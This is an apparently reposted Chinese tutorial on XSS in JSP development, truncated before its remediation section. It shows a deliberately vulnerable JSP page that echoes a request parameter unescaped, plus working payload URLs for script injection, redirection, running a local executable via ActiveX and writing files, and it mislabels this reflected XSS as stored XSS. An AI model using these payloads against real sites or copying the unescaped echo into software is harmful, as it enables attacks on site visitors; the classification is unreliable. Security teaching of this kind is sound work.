【安全开发】浅谈JSP安全开发之XSS

前言
     大家好，好男人就是我，我就是好男人，我就是-0nise。在各大漏洞举报平台，我们时常会看到XSS漏洞。那么问题来了，为何会出现这种漏洞？出现这种漏洞应该怎么修复？
目录
     1.XSS？XSS？XSS是什么鬼？
     2.XSS的危害有多大？
     3.如何避免XSS漏洞的出现
正文
1.XSS？XSS？XSS是什么鬼？
     XSS又叫跨站脚本攻击(Cross Site Scripting)，我不会告诉他原本是叫CSS的，但是为了不和我们所用的层叠样式表(Cascading Style Sheets)CSS搞混。CSS(跨站脚本攻击),CSS(层叠样式表)傻傻分不清。所以就叫XSS咯。
2.XSS的危害是什么？
实验一：
0x00构造代码

[Java] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <% String path = request.getContextPath(); String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/"; %> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html>   <head>     <base href="<%=basePath%>">     <title>My JSP 'index.jsp' starting page</title>         <meta http-equiv="pragma" content="no-cache">         <meta http-equiv="cache-control" content="no-cache">         <meta http-equiv="expires" content="0">           <meta http-equiv="keywords" content="keyword1,keyword2,keyword3">         <meta http-equiv="description" content="This is my page">   </head>   <body>     <div style="margin: 0 auto">     <% //设置编码             request.setCharacterEncoding("UTF-8"); //接收用户传入值             String tmp = request.getParameter("opr");             //减速传入值是否为空             if(tmp == null){                     out.print("111");             }else{                     //转码                     String opr = new String(tmp.getBytes("ISO-8859-1"),"utf-8");                     out.print(opr);             }     %>             我是内容     </div>   </body> </html>

0x01环境布局
 
0x02漏洞演练
我们访问:http://localhost:8080/XSS/index.jsp?opr=i%E6%98%A5%E7%A7%8B
 
然后访问:http://localhost:8080/XSS/index.jsp?opr=0nise
 
最后我们发现了一个“伟大的规律”：
   opr参数等于什么页面就打印什么。（好像是废话）
我们接着来加载一个图片看看
访问:http://localhost:8080/XSS/index.jsp?opr=%3Cimg%20src=%221.png%22%3E%3C/img%3E
 
既然图片都可以加载，那么我们JS文件是不是也阔以加载呢？
访问：http://localhost:8080/XSS/index.jsp?opr=%3Cscript%3Ealert(/i%E6%98%A5%E7%A7%8B%E7%A4%BE%E5%8C%BA%E6%AC%A2%E8%BF%8E%E5%A4%A7%E5%AE%B6/)%3C/script%3E
 
Js？Js？那么是不是可以来改变跳转后地址？
访问：http://localhost:8080/XSS/index.jsp?opr=%3Cscript%3Elocation.href=%27http://bbs.ichunqiu.com%27%3C/script%3E
 
既然xss都可以加载js，那么，我们是不是通过js来打开本地的某些东西？
 
提前放了一个MD5.exe文件
访问：http://localhost:8080/XSS/index.jsp?opr=<script> var objShell = new ActiveXObject("wscript.shell");objShell.Run("G:/work/XSS/WebRoot/Md5.exe");</script>
 
既然连本地文件都可以打开那么远程文件木马？来个电脑恶搞？这个自己慢慢象限。我可没说啊。。。。。
文件都可以打开，那么写一些文件呢？
访问：http://localhost:8080/XSS/index.jsp?opr=%3Cscript%3Evar%20fso,tf;fso%20=%20new%20ActiveXObject(%22Scripting.FileSystemObject%22);tf%20=%20fso.CreateTextFile(%22d:\\test.txt%22,true);tf.WriteLine(%22i%E6%98%A5%E7%A7%8B%E7%A4%BE%E5%8C%BA%E6%AC%A2%E8%BF%8E%E6%82%A8%22);tf.Close();alert(%22%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E6%88%90%E5%8A%9F%EF%BC%81%22);%3C/script%3E
 
 
通过以上实验我们可以看出opr参数赋值操作。如果opr参数没有值的话，就无法执行执行，被攻击者必须访问攻击者提前设计好的才能攻击。这种XSS攻击方式叫做:存储型XSS
如果你想看到更给力的实验，请接着往下看。
实验二：
前言：
大部分网站都会和数据打交道那么，XSS漏洞出现这些网站是什么样子的？

..................想查看全文请看这里》》》》原文地址：http://bbs.ichunqiu.com/thread-10891-1-1.html?from=bky